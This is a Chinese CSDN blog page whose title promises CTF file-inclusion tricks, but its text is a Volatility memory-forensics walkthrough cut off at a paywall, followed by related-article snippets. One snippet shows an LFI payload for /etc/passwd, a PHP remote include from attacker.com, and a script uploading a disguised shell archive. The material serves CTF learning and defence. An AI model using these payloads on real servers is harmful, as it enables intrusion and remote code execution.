CTF中文件包含的一些技巧

最新推荐文章于 2025-04-27 12:18:25 发布
最新推荐文章于 2025-04-27 12:18:25 发布
阅读量4k 收藏 4
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoi123/article/details/83088662
版权
本文介绍了一次CTF挑战中利用Volatility Framework进行内存取证的过程,包括如何查看内存镜像信息、提取密码哈希、查找可疑进程、文件恢复与解密,最终揭示隐藏的flag。内存取证在网络安全应急响应和犯罪调查中具有关键作用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

i春秋作家:lem0n

原文来自:浅谈内存取证

0x00 前言

网络攻击内存化和网络犯罪隐遁化,使部分关键数字证据只存在于物理内存或暂存于页面交换文件中,这使得传统的基于文件系统的计算机取证不能有效应对.内存取证作为传统文件系统取证的重要补充,是计算机取证科学的重要组成部分,通过全面获取内存数据、详尽分析内存数据,并在此基础上提取与网络攻击或网络犯罪相关的数字证据,近年来,内存取证已赢得安全社区的持续关注,获得了长足的发展与广泛应用,在网络应急响应和网络犯罪调查中发挥着不可替代的作用.首先回顾了内存取证研究的起源和发展演化过程;其次介绍了操作系统内存管理关键机制;然后探讨了内存取证的数据获取和分析方法,归纳总结目前内存取证研究的最新技术;最后讨论了内存取证存在的问题、发展趋势和进一步的研究方向.

​                                                                  ——《内存取证研究与进展[J].软件学报,2015, 26(5): 1151-1172》

0x01 实验材料

kali 渗透测试系统

easy_dump.img 内存镜像

Volatility Framework 内存取证工具

TestDisk 文件恢复工具

0x02 Volatility Framework

volatility 框架是一款用于易失性内存取证的重量级框架。在该框架下我们可以完成许多取证的操作,获取我们想取得的信息。其支持的操作系统也非常广泛,同时支持 windows , linux, Mac OSX,甚至也支持 Android 手机使用ARM处理器的取证。因此,它也是所有网络取证爱好者的必学框架。

volatility 使用:
        volatility -f <文件名> -–profile=<配置文件> <插件> [插件参数] 
通过volatility --info获取工具所支持的profile,Address Spaces,Scanner Checks,Plugins

常用插件:
imageinfo:显示目标镜像的摘要信息,知道镜像的操作系统后,就可以在 –profile 中带上对应的操作系统
pslist:该插件列举出系统进程,但它不能检测到隐藏或者解链的进程,psscan可以
psscan:可以找到先前已终止(不活动)的进程以及被rootkit隐藏或解链的进程
pstree:以树的形式查看进程列表,和pslist一样,也无法检测隐藏或解链的进程
mendump:提取出指定进程,常用foremost 来分离里面的文件
filescan:扫描所有的文件列表
hashdump:查看当前操作系统中的 password hash,例如 Windows 的 SAM 文件内容
svcscan:扫描 Windows 的服务
connscan:查看网络连接

0x03 实验过程

利用 volatility -f easy_dump.img imageinfo查看镜像信息

root@kali:~/Desktop# volatility -f easy_dump.img imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/root/Desktop/easy_dump.img)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf8000403f070L
          Number of Processors : 1
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff80004040d00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 20
最低0.47元/天 解锁文章
CTF---Web---文件包含---01
qq_22160557的博客
07-28 1160
文章目录前言一、题目描述二、解题步骤1.查看源代码2.文件包含(/etc/passwd)3.解码总结 前言 题目分类: CTF—Web—文件包含 一、题目描述 题目:提示寻找passwd文件 二、解题步骤 1.查看源代码 提示所有图片存储路径是download.php?name=img, 此时name参数的存在就提示此题可能为“文件包含”。 2.文件包含(/etc/passwd) 两种查看方式: 2.1、访问view-source:http://192.168.87.180/download.php
CTF-REVERSE练习之信息提取
ChuMeng1999的博客
11-29 570
目录预备知识相关实验C32Asm二维码Exif信息实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 相关实验 本实验要求您已经认真学习和完成了《CTF REVERSE练习之逆向初探》。 C32Asm 一款非常不错的国产静态反编译工具,C32Asm现具有如下功能:快速静态反编译PE格式文件(Exe、Dll等),提供Hex文件编辑功能,功能强大,提供内存Dump、内存编辑、PE文件Dump、PE内存ImageSize修正等多种实用功能。 通常主要将C32Asm当做16进制编辑器来使用,因为成熟的静态反编
CTF 中的 include(文件包含)
最新发布
yqya_的博客
04-27 391
ctf 中对于 include(文件包含) 的考察
CTF web题型解题技巧
weixin_30654419的博客
04-23 2568
工具集 基础工具:Burpsuite,python,firefox(hackbar,foxyproxy,user-agent,swither等) 扫描工具:nmap,nessus,openvas sql注入工具:sqlmap等 xss平台:xssplatfrom,beef 文件上传工具:cknife 文件包含工具:LFlsuite 暴力破解工具:burp暴力破解模块,md5Crack...
CTF—基于BinWalk实现文件提取
weixin_52620919的博客
07-27 6813
预备知识 BinWalk BinWalk是一款固件分析工具,旨在协助研究人员对固件进行分析、提取及逆向工程之用。BinWalk简单易用,支持自动化脚本、自定义签名、提取规则和插件模块。BinWalk的使用方法十分简单,提供待分析的文件路径即可。 【BinWalk】常用于识别任意二进制数据块中所包含的指定类型的文件数据。 AES算法 AES(高级加密标准)是一个对称分组密码算法,旨在取代DES(数据加密标准)成为广泛使用的标准,其加密过程比较复杂,分为字节代替、行移位、列混淆、轮密钥加四个步骤,具体的实现过
ctf中怎样获取php文件源码,CTF文件包含的一些技巧
weixin_39580682的博客
03-09 3910
前言文件包含CTF 比赛也是常考的一个点,这里对一些包含点的原理、特征进行一些总结,并结合实际的例子来讲解如何绕过。php伪协议的分类伪协议是文件包含的基础,理解伪协议的的原理才能更好的利用文件包含漏洞。php://inputphp://input代表可以访问请求的原始数据,简单来说POST请求的情况下,php://input可以获取到post的数据。使用条件:include()、includ...
网络安全-实战篇 实战经验丨CTF文件包含技巧总结
Coisini的博客
05-30 965
站在巨人的肩头才会看见更远的世界,这是一篇技术牛人对CTF比赛中文件包含的内容总结,主要是对一些包含点的原理和特征进行归纳分析,并结合实际的例子来讲解如何绕过,全面细致,通俗易懂,掌握这个新技能定会让你在CTF路上少走很多弯路,不看真的会后悔! php伪协议的分类 伪协议是文件包含的基础,理解伪协议的原理才能更好的利用文件包含漏洞。 php://input php://input代表可以访问请求...
ctf 文件包含总结
njqfb的博客
06-04 1771
php伪协议 文件包含用到伪协议的情况挺多 php://input php://input是个可以访问请求的原始数据的只读流,可以理解为读取到的POST上传的数据 当协议当作文件打开时,POST上传的内容相当于文件内容,enctype="multipart/form-data" 的时候 php://input 是无效的 利用: 使用php://input协议并POST要执行的代码 绕过file_get_contents函数进行的文件内容检测,比如函数打开一个文件,并验证文件内容是否为xxx,此时可以用php
CTF比赛的各种解题技巧
02-28
2. 文件包含漏洞:通过包含恶意文件实现任意代码执行。 3. 命令注入:通过inject恶意命令控制服务器。 4. XSS(Cross-Site Scripting):通过inject恶意脚本控制用户。 三、密码学 密码学是CTF比赛的重要组成部分...
Windows取证实验
qq_63855830的博客
03-26 2825
Windows活取证实验
DUMPIT.exe
05-28
内存镜像读取,内存镜像读取,内存镜像读取,内存镜像读取
CTF-朴实无华的内存取证
qq_43611848的博客
01-11 5607
题目描述 链接:https://pan.baidu.com/s/1dC4reO8opHQ3yZ8PdtD_AQ 提取码:lzsa 解题过程: 1.下载文件1.raw,放到kali里。 2.volatility -f 1.raw imageinfo 2.尝试第一个profile类型,查看进程 volatility -f 1.raw pslist --profile=WinXPSP2x86 3.grep过滤flag关键字试试 volatility -f 1.raw --profile=WinXPSP2x86
一文讲述内存取证的数据保存、数据分析、CTF实战案例
qq_53058639的博客
10-27 380
网络攻击内存化和网络犯罪的隐遁化,使部分关键数字证据只存在于物理内存或暂存于页面交换文件中,这使得传统的基于文件系统的计算机取证不能有效应对。内存取证通过全面获取内存数据、详尽的内存数据分析,并在此基础上提取与网络攻击或网络犯罪相关的数字证据,在网络应急响应和网络犯罪调查中发挥着不可替代的作用。Dumpit和Volatility是两款内存取证工具,今天将分享利用这两款工具的内存取证的方法,结合CTF内存取证题来做详解。欢迎各路高手一同切磋讨论。
BUUCTF [RoarCTF2019]forensic
../../../../../../../
10-12 1501
打开 下载到mem.raw 把mem.raw放入kali volatility查看镜像 volatility -f mem.raw imageinfo 建议用profile, 后面用Win7SP1x86 查看内存进程: volatility -f men.raw pslist --profile Win7SP1x86 发现有几个进程 了解发现: TrueCrypt.exe是一款磁盘加密工具,所有虚拟磁盘上的文件都被自动加密,需要通过密码来进行访问。 notepad.exe windows自带记事本
浅谈内存取证
weixin_50464560的博客
09-15 1447
i春秋作家:lem0n原文来自:浅谈内存取证0x00 前言网络攻击内存化和网络犯罪隐遁化,使部分关键数字证据只存在于物理内存或暂存于页面交换文件中,这使得传统的基于文件系统的计算机取证不能有效应对.内存取证作为传统文件系统取证的重要补充,是计算机取证科学的重要组成部分,通过全面获取内存数据、详尽分析内存数据,并在此基础上提取与网络攻击或网络犯罪相关的数字证据,近年来,内存取证已赢得安全社区的持续关注,获得了长足的发展与广泛应用,在网络应急响应和网络犯罪调查中发挥着不可替代的作用.首先回顾了内存取证研究的起源
CTF
weixin_56817426的博客
04-12 1276
文章目录CTF一、十进制转36进制做题步骤二、a1z26做题步骤三、4进制做题步骤总结 CTF 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、十进制转36进制 做题步骤 要先导入base36的数据包,否则无法运行。 代码: import base36 num=597142166468670232704404065453992639482284357949191.
SWPUCTF_2019_p1KkHeap
z1r0的博客
03-12 284
SWPUCTF_2019_p1KkHeap 查看保护 开了沙盒,用orw来读即可。 这里mmap了0x66660000这一段内存rwx权限。所以我们可以将shellcode放入这里。 一个uaf漏洞 攻击思路:因为有一个uaf,便是delete只能用三次。所以可以考虑攻击tcache这个结构体。然后劫持这个结构体实现任意地址分配 1.首先需要泄露一个heap_addr用这个heap_addr来计算出tcache的地址。创建的堆块超过fatstbin的大小即可。 这里笔者选的是0x100 2.泄露出了
ctfhub 文件包含
03-30
### CTFHub 文件包含漏洞 利用与防御 #### 背景介绍 文件包含漏洞是一种常见的 Web 应用程序安全漏洞,主要存在于基于 PHP 的服务器端脚本语言中。该漏洞允许攻击者通过指定路径的方式,在目标应用中加载并执行恶意文件的内容。这可能导致远程代码执行 (RCE),进而使攻击者完全控制受害者的服务器环境。 #### 漏洞原理 当应用程序未对用户输入进行严格过滤时,可能会接受来自用户的任意文件名或 URL 并尝试将其作为参数传递给 `include` 或 `require` 函数。如果这些函数被滥用,则可能引入本地文件包含 (LFI, Local File Inclusion) 和远程文件包含 (RFI, Remote File Inclusion) 攻击向量[^3]。 #### 实践案例分析 ##### 1. **本地文件包含** 在某些情况下,开发者会错误地依赖于未经验证的动态变量来决定要包含哪个配置或其他类型的资源文件。例如: ```php <?php $file = $_GET['file']; include($file . '.php'); ?> ``` 上述代码片段存在明显的安全隐患,因为它允许攻击者通过调整 GET 请求中的 `file` 参数注入其他有效载荷。比如访问 `/vulnerable_page.php?file=../../etc/passwd%00` 可能暴露系统密码数据库的信息[^2]。 ##### 2. **远程文件包含** 对于支持 HTTP 协议请求的场景下,默认开启 allow_url_fopen 配置项或者启用了 cURL 扩展库的情况下,可以实现跨站点调用功能。这意味着即使无法直接写入物理磁盘上的新脚本文件,也可以间接引用网络上托管好的 payload 来完成同样的目的。 ```php <?php $url = 'http://attacker.com/malicious_code.txt'; include $url; ?> ``` #### 防御措施建议 针对此类威胁采取有效的缓解策略至关重要: - 对所有外部可控的数据实施白名单机制而非黑名单模式; - 禁止使用危险的核心方法如 include(), require() ,改用更安全替代品; - 关闭不必要的特性开关像 php.ini 中设置 disable_functions="passthru,exec,system,chroot,..."; - 定期审查源码质量以及第三方组件安全性评估报告; 此外还需注意的是备份管理不当也可能引发类似后果,因为许多 web server 默认不会解析扩展名为 bak 的副本文档,所以它们往往能够绕过常规防护层而被公开下载下来[^4]。 最后值得注意的一个技巧是在实际竞赛环境中经常结合文件上传接口来进行综合测试。例如将含有木马指令序列打包成 zip 归档后再伪装成图片形式提交上去之后再设法触发解压过程达到最终效果[^5]. ```python import requests files = {'upload': ('shell_dir_zip.png', open('shell_dir.zip', 'rb'))} response = requests.post(url='target_upload_endpoint', files=files) print(response.text) ``` 以上就是围绕 CTFHub 上有关文件包含漏洞相关内容整理出来的知识点总结及其对应的实际操作指南说明。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值